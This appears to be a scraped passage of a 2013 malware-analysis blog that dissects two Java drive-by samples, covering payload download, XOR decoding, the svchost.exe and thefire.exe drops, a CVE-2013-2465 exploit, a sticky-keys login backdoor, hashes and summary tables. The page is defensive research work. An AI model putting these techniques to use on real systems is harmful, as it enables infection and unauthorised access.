<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg81tKFoLepG4tem0AHZ6BiGV1emTDYtRpUPrCjCy-Yy_8idpDGfbRbxD01HfkdDnr-qnx2-Zm2E9Ds-uQSZ9Nj-lB7gObOFi6i83Ud3RnYYWp34F-C5gvreE62uJ_jB0m27CQl6oPOWefp/s1600/Unknown_2013-10-03_OS_check_JAR_pull.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg81tKFoLepG4tem0AHZ6BiGV1emTDYtRpUPrCjCy-Yy_8idpDGfbRbxD01HfkdDnr-qnx2-Zm2E9Ds-uQSZ9Nj-lB7gObOFi6i83Ud3RnYYWp34F-C5gvreE62uJ_jB0m27CQl6oPOWefp/s1600/Unknown_2013-10-03_OS_check_JAR_pull.png" height="24" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">OS type check and JAR request through '<span style="color: #3d85c6;">document.write</span>'</span></i></div>
<br />
This Java Malware targets Windows machines only. Even if Java is present the script execution will stop if no Windows OS is found. The detection is based on browser's '<span style="color: #3d85c6;">User-Agent</span>' value.<br />
<br />
<b><span style="color: #3d85c6;">"This one time, at band camp..."</span></b><br />
<br />
As mentioned earlier, there is no exploit code in the JAR file. The execution starts with creating a simple folder structure on drive '<span style="color: #3d85c6;">C</span>'.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZgxJMuC4RasJi_pAg_rt2LMmzkr4iBH3VK5Dsj45zk0lqviaTkGo7JaDC_LFnKrcpEBqfB9niMfiCBXL7eAKIgfavhxIFG-j10ta9KyCDGibH46Iw8BBArex1RzHC3wDFBR1PPDrV8-5e/s1600/Unknown_2013-10-03_creating_folders.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZgxJMuC4RasJi_pAg_rt2LMmzkr4iBH3VK5Dsj45zk0lqviaTkGo7JaDC_LFnKrcpEBqfB9niMfiCBXL7eAKIgfavhxIFG-j10ta9KyCDGibH46Iw8BBArex1RzHC3wDFBR1PPDrV8-5e/s1600/Unknown_2013-10-03_creating_folders.png" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">call for '<span style="color: #3d85c6;">docmdsyn</span>' to create two folders</span></i></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBZjYZ1Bi-8nQ9eZ6hOPJ90ArvUOIflanP_UGerrXy-gXOr3tK7qPlUNysx8YjcWVr_4S0h3x1bh9ShxL6y-a1TWtcy3GSH9RbGIicGorsbXJp4D8MOaLLYf8OGpbgk6W9-YppFXUSFkU1/s1600/Unknown_2013-10-03_docmdsyn_function.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBZjYZ1Bi-8nQ9eZ6hOPJ90ArvUOIflanP_UGerrXy-gXOr3tK7qPlUNysx8YjcWVr_4S0h3x1bh9ShxL6y-a1TWtcy3GSH9RbGIicGorsbXJp4D8MOaLLYf8OGpbgk6W9-YppFXUSFkU1/s1600/Unknown_2013-10-03_docmdsyn_function.png" height="95" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">'<span style="color: #3d85c6;">docmdsyn</span>' function calls '<span style="color: #3d85c6;">cmd.exe</span>' to run the commands</span></i></div>
<br />
Regardless of the outcome of running the two commands, the execution will continue with a request for the Initial Payload using hardcoded URL and a '<span style="color: #3d85c6;">borrowed</span>' Java code.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhc-Sv6LcnKFKzjlQ_dXuFOnIZAkj_7-z0LRZicP3jQp0oxxSIBj7oy6jH887S2ku7mZiIuVTuRvrNtwkiXiTWFG6lLycgU_Ey-67vdglKLBP2x6K72yL2q0VtS1GHs0XWGuFBX0J4EMDO1/s1600/Unknown_2013-10-03_payload_request.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhc-Sv6LcnKFKzjlQ_dXuFOnIZAkj_7-z0LRZicP3jQp0oxxSIBj7oy6jH887S2ku7mZiIuVTuRvrNtwkiXiTWFG6lLycgU_Ey-67vdglKLBP2x6K72yL2q0VtS1GHs0XWGuFBX0J4EMDO1/s1600/Unknown_2013-10-03_payload_request.png" height="62" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">hardcoded URL & '<span style="color: #3d85c6;">downloadFile</span>' function call</span></i></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3VUP7twwtBSbVFy4L2xHkfbdRVYhq9UuMiszUtacJZdZIfdFrdGacBdjwvN9PXC521bcaGxr_MqEmoUGj6R-g6ICsXRVle6f_-zyypqEq70S2CxBhkssjCcGAhptJY0uAzNdbY_-Myyz3/s1600/Unknown_2013-10-03_downloadFile_function.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3VUP7twwtBSbVFy4L2xHkfbdRVYhq9UuMiszUtacJZdZIfdFrdGacBdjwvN9PXC521bcaGxr_MqEmoUGj6R-g6ICsXRVle6f_-zyypqEq70S2CxBhkssjCcGAhptJY0uAzNdbY_-Myyz3/s1600/Unknown_2013-10-03_downloadFile_function.png" height="199" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">'<span style="color: #3d85c6;">downloadFile</span>' function</span></i></div>
<br />
Thinking that '<span style="color: #3d85c6;">this url is error</span>' sounds like rather strange English, I did a search for '<span style="color: #3d85c6;">System.out.println("this url is error");</span>' expression and noticed that most of the search results are pointing at Chinese websites. From what I can figure out using Google Translate, the websites are forums/boards used by Java developers to exchange knowledge and share different code samples for different purposes. The code samples there are almost 100% matching the function in the screenshot above.<br />
<br />
The Initial Payload is XORed with a single value key - '<span style="color: #3d85c6;">0x12</span>'. The encoded version of the payload will be stored in '<span style="color: #3d85c6;">c:\users\public\svchost.cab</span>' and passed to a function do decode it.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggOsNOErwGqUIxWLRQ1VRARxjAEqxDC1rRE2vT9Y93qhjQvx5wo9rVKKlWFM91to6nULMQ6Q344Gsg0DuZ5OGwlo8tTxao-ffx5u_NhiqLLuQJBAXnmRprVHwUyVBxG9hB_LdYkuU8bVkw/s1600/Unknown_2013-10-03_xorEn_function.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggOsNOErwGqUIxWLRQ1VRARxjAEqxDC1rRE2vT9Y93qhjQvx5wo9rVKKlWFM91to6nULMQ6Q344Gsg0DuZ5OGwlo8tTxao-ffx5u_NhiqLLuQJBAXnmRprVHwUyVBxG9hB_LdYkuU8bVkw/s1600/Unknown_2013-10-03_xorEn_function.png" height="155" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">part of '<span style="color: #3d85c6;">xorEn</span>' function code</span></i></div>
<br />
There are tons of unused code and the declaration of '<span style="color: #3d85c6;">XOR_CONST</span>' variable is just a small example of it. Hoping to find something interesting, did another search using just a part of the declaration statement - '<span style="color: #3d85c6;">public static final byte XOR_CONST</span>' . Surprisingly, the search result page contained links pointing at the same Chinese websites with Java code samples that match quite closely the code in the screenshot above even including the '<span style="color: #3d85c6;">xor</span>' key value. So, if not the author's location, at least some parts of the source code seem to be specific to one particular geographical region.<br />
<br />
Once the Initial Payload is decoded, it'll be stored in '<span style="color: #3d85c6;">c:\users\public\svchost.exe</span>' and executed using the same '<span style="color: #3d85c6;">docmdsyn</span>' function. It's not all though. There is a small bonus in the form of some registry changes and a clean up operation.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiV5Rj9rIzvh2srOyiERC0asiG5JSOmKdi3q5kIIQqcyrvJg9po9Ae8gacYtGIKg2OxlZ0FB5zPND4JCFrnkTRUa6WmuY0nL5lNHel4jHrTxQgVj7ZtPRTLe-VGp6hJ6l_2nqxG3ap8lzsl/s1600/Unknown_2013-10-03_bonus.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiV5Rj9rIzvh2srOyiERC0asiG5JSOmKdi3q5kIIQqcyrvJg9po9Ae8gacYtGIKg2OxlZ0FB5zPND4JCFrnkTRUa6WmuY0nL5lNHel4jHrTxQgVj7ZtPRTLe-VGp6hJ6l_2nqxG3ap8lzsl/s1600/Unknown_2013-10-03_bonus.png" height="22" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">Windows Terminal Services changes</span></i></div>
<br />
Number of commands will be executed to enable Windows Terminal Services and delete the encoded Initial Payload. One of the registry key changes enables spawning '<span style="color: #3d85c6;">Windows Command Prompt</span>' at the login screen by hitting a key on the keyboard a few types - also known as '<span style="color: #3d85c6;">sticky keys</span>' <a href="http://blogs.mcafee.com/mcafee-labs/windows-vista-vulnerable-to-stickykeys-backdoor" rel="nofollow" target="_blank">vulnerability</a>.<br />
<br />
<b><span style="color: #3d85c6;">"Summary"</span></b><br />
<br />
<style type="text/css">.nobrtable br { display: none }</style>
<br />
<div class="nobrtable">
<table align="center" border="2" bordercolor="#FFFFFF" cellpadding="3" cellspacing="3" style="background-color: black; width: 100%px;">
<tbody>
<tr>
<td style="background-color: #f79646; color: white;"><b>General Information</b></td>
<td style="background-color: #f79646; color: white;"><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Name:</td>
<td style="background-color: #b8cce4; color: black;">Unknown</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Date captured:</td>
<td style="background-color: #b8cce4; color: black;">2013-10-03</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Date analysed:</td>
<td style="background-color: #b8cce4; color: black;">2013-10-07</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Source/Credits:</td>
<td style="background-color: #b8cce4; color: black;">Live Fiddler capture</td>
</tr>
<tr>
<td><br /></td>
<td><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Infection vectors detected:</td>
<td style="background-color: #b8cce4; color: black;">Java</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Vulnerabilities targeted:</td>
<td style="background-color: #b8cce4; color: black;"><pre>'sticky keys' - login bypass</pre>
</td>
</tr>
<tr>
<td><br /></td>
<td><br /></td>
</tr>
<tr>
<td style="background-color: #f79646; color: white;"><b>Landing page</b></td>
<td style="background-color: #f79646; color: white;"><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Transfer mode:</td>
<td style="background-color: #b8cce4; color: black;">plain text</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Obfuscation:</td>
<td style="background-color: #b8cce4; color: black;">No</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">TDS:</td>
<td style="background-color: #b8cce4; color: black;">No</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">JNLP:</td>
<td style="background-color: #b8cce4; color: black;">No</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">JVM parameters:</td>
<td style="background-color: #b8cce4; color: black;">None</td>
</tr>
<tr>
<td><br /></td>
<td><br /></td>
</tr>
<tr>
<td style="background-color: #f79646; color: white;"><b>Java infection vector</b></td>
<td style="background-color: #f79646; color: white;"><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Captured with:</td>
<td style="background-color: #b8cce4; color: black;">Java 1.7.17</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Obfuscation:</td>
<td style="background-color: #b8cce4; color: black;">None</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">JAR hidden content:</td>
<td style="background-color: #b8cce4; color: black;">None</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload delivery method:</td>
<td style="background-color: #b8cce4; color: black;">URL</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload encryption/encoding:</td>
<td style="background-color: #b8cce4; color: black;">XOR single value key - 0x12</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload store location:</td>
<td style="background-color: #b8cce4; color: black;">c:\users\public\</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload filename:</td>
<td style="background-color: #b8cce4; color: black;">Hardcoded - 'svchost.exe'</td>
</tr>
<tr>
<td><br /></td>
<td><br /></td>
</tr>
<tr>
<td style="background-color: #f79646; color: white;"><b>Adobe infection vector</b></td>
<td style="background-color: #f79646; color: white;"><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Captured with:</td>
<td style="background-color: #b8cce4; color: black;">Not implemented</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload delivery method:</td>
<td style="background-color: #b8cce4; color: black;"><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload store location:</td>
<td style="background-color: #b8cce4; color: black;"><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload filename:</td>
<td style="background-color: #b8cce4; color: black;"><br /></td>
</tr>
<tr>
<td><br /></td>
<td><br /></td>
</tr>
<tr>
<td style="background-color: #f79646; color: white;"><b>Automated analysis</b></td>
<td style="background-color: #f79646; color: white;"><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Exploit components:</td>
<td style="background-color: #b8cce4; color: black;"><pre>None</pre>
</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Delivered malware:</td>
<td style="background-color: #b8cce4; color: black;"><pre>(JAR)MD5 - 839d43c69935a8a93e0b9f6c3d715c53
virustotal.com - <a href="https://www.virustotal.com/en/file/ff81f9e57122ef4fbff84c934d2e9989370184010e1cb4faf74a468d0931912a/analysis/" rel="nofollow" target="_blank">link</a>
(EXE)MD5 - 27af067a2dd507862290779679c68b6d
virustotal.com - <a href="https://www.virustotal.com/en/file/3dd4e97d66ac846a4deb95a7ee1f2c0688cd8b48cae608be23473c1fbb627f84/analysis/" rel="nofollow" target="_blank">link</a></pre>
</td>
</tr>
<tr>
<td><br /></td>
<td><br /></td>
</tr>
<tr>
<td style="background-color: #f79646; color: white;"><b>Additional Information</b></td>
<td style="background-color: #f79646; color: white;"><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;"><br /></td>
<td style="background-color: #b8cce4; color: black;"><pre>Some of the code used seems to be
coming from Chinese websites sharing
public Java code samples</pre>
</td>
</tr>
</tbody></table>
</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-250109472373647719.post-32461922732438225232013-10-07T12:55:00.001+01:002013-10-07T12:55:13.441+01:00Unknown EK: "I wanna be a billionaire so freaking bad..."NOTE: Information is based on a sample captured on 2013-10-02<br />
<br />
I'm not sure if definition '<span style="color: #3d85c6;">exploit kit</span>' is actually applicable here. Yes, there is an exploit code copied from PSA(Packet Storm Advisory) for '<span style="color: #3d85c6;">CVE-2013-2465</span>', but I'd expect more code around it before calling it a '<span style="color: #3d85c6;">kit</span>' and I can't imagine there is a server side code exist. There is no any sort of environment validation: plugins and their version identification, initial payload encryption, data encoding, code obfuscation. Base64 encoding is used just once to '<span style="color: #3d85c6;">hide</span>' a single string. So, another '<span style="color: #3d85c6;">interesting</span>' work.<br />
<br />
<b><span style="color: #3d85c6;">"Landing page"</span></b><br />
<br />
URL pattern is short and simple.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIghGtR-OCXFvmwlj7kwKrBeP4n5YS2VNT2Iq07yl_Cl98YgnDRmVvrB0OLgX9PrCUx-3Q77f02G6OFUNiRfZLeMx3cTQDqIazjUOVCz1NYcpbslkgnbNPXypWSZ0OKHvmI5PLdcUb0qQ_/s1600/Unknown-2013-10-02_URL_pattern.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIghGtR-OCXFvmwlj7kwKrBeP4n5YS2VNT2Iq07yl_Cl98YgnDRmVvrB0OLgX9PrCUx-3Q77f02G6OFUNiRfZLeMx3cTQDqIazjUOVCz1NYcpbslkgnbNPXypWSZ0OKHvmI5PLdcUb0qQ_/s1600/Unknown-2013-10-02_URL_pattern.png" height="36" width="320" /></a></div>
<br />
The landing page is also short and simple.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpFC7I_kzz_hKT9mhbahGYhGxGGJpZXNsllCTXHXpMNQRCj35oXeXLCjAuBSYof4yBy9dWT8Wdia-CVaJUIC10N1KE4qRqgV1yfrXE-UnbFvuPF6_9RWqO_oq7ZZ5OaiQThvcXW56JCL0E/s1600/Unknown-2013-10-02_landing_page.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpFC7I_kzz_hKT9mhbahGYhGxGGJpZXNsllCTXHXpMNQRCj35oXeXLCjAuBSYof4yBy9dWT8Wdia-CVaJUIC10N1KE4qRqgV1yfrXE-UnbFvuPF6_9RWqO_oq7ZZ5OaiQThvcXW56JCL0E/s1600/Unknown-2013-10-02_landing_page.png" height="26" width="320" /></a></div>
<br />
The parameter name is the first hint to the possible origins of this Java exploit. '<span style="color: #3d85c6;">kurban</span>' translated from Turkish means '<span style="color: #3d85c6;">victim</span>'. The value held by this parameter is the Initial Payload location.<br />
<br />
<b><span style="color: #3d85c6;">"JAR file"</span></b><br />
<br />
JAR file is '<span style="color: #3d85c6;">packed</span>' with goodies. The execution begins with an attempt to exploit '<span style="color: #3d85c6;">CVE-2013-2465</span>' vulnerability.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTFK72XJnpVj8rTREYf3TJxo6FYT5iafTW67jTVovgj1MGK0lpK59-kmmACMADgqAzpReQ4JvWpQe3bbujhUlyHkGuWj7MO-hE7_uU08raEVRdQFsJqhgYr2RaFJdJt65lVABeE2aMghDE/s1600/Unknown-2013-10-02_CVE-2013-2465.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTFK72XJnpVj8rTREYf3TJxo6FYT5iafTW67jTVovgj1MGK0lpK59-kmmACMADgqAzpReQ4JvWpQe3bbujhUlyHkGuWj7MO-hE7_uU08raEVRdQFsJqhgYr2RaFJdJt65lVABeE2aMghDE/s1600/Unknown-2013-10-02_CVE-2013-2465.png" height="76" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">part of PSA exploit code for CVE-2013-2465</span></i></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;"><br /></span></i></div>
<div style="text-align: left;">
Just before diving into screwing '<span style="color: #3d85c6;">storeImageArray()</span>' function, a single call for '<span style="color: #3d85c6;">base64coder</span>' is made to decode a single and the only encoded string.</div>
<div style="text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9e1wn6gWW7nebbIgNxmGel5CWDhZihOaNBIPgAbAnPRZOBdVaZtQW7RvKc2susgptNJG4yGCe_QV4ZYF1P0b-I4mFXglppBz2Is-j6jFCQJku30l1kYvebNaMBgVAlS-Pwb5NiFk312ux/s1600/Unknown-2013-10-02_base64coder_call.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9e1wn6gWW7nebbIgNxmGel5CWDhZihOaNBIPgAbAnPRZOBdVaZtQW7RvKc2susgptNJG4yGCe_QV4ZYF1P0b-I4mFXglppBz2Is-j6jFCQJku30l1kYvebNaMBgVAlS-Pwb5NiFk312ux/s1600/Unknown-2013-10-02_base64coder_call.png" height="36" width="320" /></a></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
The author was rushing because mum just called him/her for dinner and didn't bother cleaning up someone's '<span style="color: #3d85c6;">base64coder</span>' <a href="http://www.source-code.biz/base64coder/java/Base64Coder.java.txt" rel="nofollow" target="_blank">code</a> that might have been copied from '<span style="color: #3d85c6;">source-code.biz</span>'. All encoding methods were left in even though are not used.</div>
<div style="text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWrYsY-GxK8JzyGkIA35t_qWtth002JXjCGXhbxr2rH6Z5iaKTlGfwhPLp8BcYeAsKWUIDEyMluQW1rRhirW_F8H2OnsnNiy8ghyphenhyphene7aul3hYFfC7OLmqXIxaRXP5YeE9brv6UE1wPWA6oL/s1600/Unknown-2013-10-02_base64coder_methods.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWrYsY-GxK8JzyGkIA35t_qWtth002JXjCGXhbxr2rH6Z5iaKTlGfwhPLp8BcYeAsKWUIDEyMluQW1rRhirW_F8H2OnsnNiy8ghyphenhyphene7aul3hYFfC7OLmqXIxaRXP5YeE9brv6UE1wPWA6oL/s1600/Unknown-2013-10-02_base64coder_methods.png" height="298" width="320" /></a></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
A few more hints pointing at the origins or one of the languages the author is speaking.</div>
<div style="text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEmpiW5F83MqUujJNYQpXYpuelmFJc-Rt9ZzXdULFJ7bw4JVXczaCGkyLunCzj7jNuNba17sXXttOkfIRZwQngk4z_5cSuTyDTY-POZeqIe4sCgaTNizNVFVAJSdKCrQ9a-vpE4TrAJ5T9/s1600/Unknown-2013-10-02_turkish_words.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEmpiW5F83MqUujJNYQpXYpuelmFJc-Rt9ZzXdULFJ7bw4JVXczaCGkyLunCzj7jNuNba17sXXttOkfIRZwQngk4z_5cSuTyDTY-POZeqIe4sCgaTNizNVFVAJSdKCrQ9a-vpE4TrAJ5T9/s1600/Unknown-2013-10-02_turkish_words.png" height="136" width="320" /></a></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
Google translated from Turkish: '<span style="color: #3d85c6;">dosyayazdirici</span>' - printing a file, '<span style="color: #3d85c6;">baglantiaç</span>' - open link, '<span style="color: #3d85c6;">bayt</span>' - byte. The screenshot above is a part of the code that fetches the initial payload via URL passed from the landing page. Once it's downloaded, it'll be stored in the default temporary-file directory with hardcoded filename - '<span style="color: #3d85c6;">thefire.exe</span>'.</div>
<div style="text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgk-U0Vee0asi4nSiwtvK2sdoQbtUrChyphenhyphen1gZ3t6h0Lb6Mpde3Zc0bgY4CUWnZ9g6oMhFtz7vxiSMoKLqdKcnf25Xdy9KePfJof4gzmdrqINGl-lxANSoSqOanAjS2_6Z_orahkvg-L7GXpI/s1600/Unknown-2013-10-02_filename.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgk-U0Vee0asi4nSiwtvK2sdoQbtUrChyphenhyphen1gZ3t6h0Lb6Mpde3Zc0bgY4CUWnZ9g6oMhFtz7vxiSMoKLqdKcnf25Xdy9KePfJof4gzmdrqINGl-lxANSoSqOanAjS2_6Z_orahkvg-L7GXpI/s1600/Unknown-2013-10-02_filename.png" height="52" width="320" /></a></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
The link to the initial payload was dead by the time the capture was performed. Judging by the filename - '<span style="color: #3d85c6;">install_flash_player.exe</span>', it could have been '<span style="color: #3d85c6;">ZeroAccess</span>'.</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
One rather odd thing is the name for the method performing the exploit - '<span style="color: #3d85c6;">uganda</span>'. Maybe the author's favourite country or maybe the target, who knows.</div>
<div style="text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipDKWeuQ-FGMabQa9jYjQDCL5zV1siRSWt3K4Lav7uAeOVXSVsU-tSC-CkQeXR9MdFucVvJJtI4sMDoXew5SGBxzsBMDQIj7XXHkjYXMd8nsE9J2ugHzmO44BSzjJ1Xpg2R1mJQ_9tb6ra/s1600/Unknown-2013-10-02_odd_name.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipDKWeuQ-FGMabQa9jYjQDCL5zV1siRSWt3K4Lav7uAeOVXSVsU-tSC-CkQeXR9MdFucVvJJtI4sMDoXew5SGBxzsBMDQIj7XXHkjYXMd8nsE9J2ugHzmO44BSzjJ1Xpg2R1mJQ_9tb6ra/s1600/Unknown-2013-10-02_odd_name.png" height="68" width="320" /></a></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<b><span style="color: #3d85c6;">"Summary"</span></b></div>
<div style="text-align: left;">
<br /></div>
<style type="text/css">.nobrtable br { display: none }</style>
<br />
<div class="nobrtable">
<table align="center" border="2" bordercolor="#FFFFFF" cellpadding="3" cellspacing="3" style="background-color: black; width: 100%px;">
<tbody>
<tr>
<td style="background-color: #f79646; color: white;"><b>General Information</b></td>
<td style="background-color: #f79646; color: white;"><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Name:</td>
<td style="background-color: #b8cce4; color: black;">Unknown</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Date captured:</td>
<td style="background-color: #b8cce4; color: black;">2013-10-02</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Date analysed:</td>
<td style="background-color: #b8cce4; color: black;">2013-10-04</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Source/Credits:</td>
<td style="background-color: #b8cce4; color: black;">Live Fiddler capture</td>
</tr>
<tr>
<td><br /></td>
<td><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Infection vectors detected:</td>
<td style="background-color: #b8cce4; color: black;">Java</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Vulnerabilities targeted:</td>
<td style="background-color: #b8cce4; color: black;"><pre>CVE-2013-2465</pre>
</td>
</tr>
<tr>
<td><br /></td>
<td><br /></td>
</tr>
<tr>
<td style="background-color: #f79646; color: white;"><b>Landing page</b></td>
<td style="background-color: #f79646; color: white;"><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Transfer mode:</td>
<td style="background-color: #b8cce4; color: black;">plain text</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Obfuscation:</td>
<td style="background-color: #b8cce4; color: black;">No</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">TDS:</td>
<td style="background-color: #b8cce4; color: black;">No</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">JNLP:</td>
<td style="background-color: #b8cce4; color: black;">No</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">JVM parameters:</td>
<td style="background-color: #b8cce4; color: black;">1</td>
</tr>
<tr>
<td><br /></td>
<td><br /></td>
</tr>
<tr>
<td style="background-color: #f79646; color: white;"><b>Java infection vector</b></td>
<td style="background-color: #f79646; color: white;"><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Captured with:</td>
<td style="background-color: #b8cce4; color: black;">Direct download - Firefox/14.0.1</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Obfuscation:</td>
<td style="background-color: #b8cce4; color: black;">None</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">JAR hidden content:</td>
<td style="background-color: #b8cce4; color: black;">None</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload delivery method:</td>
<td style="background-color: #b8cce4; color: black;">URL</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload encryption/encoding:</td>
<td style="background-color: #b8cce4; color: black;">No</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload store location:</td>
<td style="background-color: #b8cce4; color: black;">Default temporary-file directory</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload filename:</td>
<td style="background-color: #b8cce4; color: black;">Hardcoded - 'thefire.exe'</td>
</tr>
<tr>
<td><br /></td>
<td><br /></td>
</tr>
<tr>
<td style="background-color: #f79646; color: white;"><b>Adobe infection vector</b></td>
<td style="background-color: #f79646; color: white;"><br /></td>
</tr>
<tr>
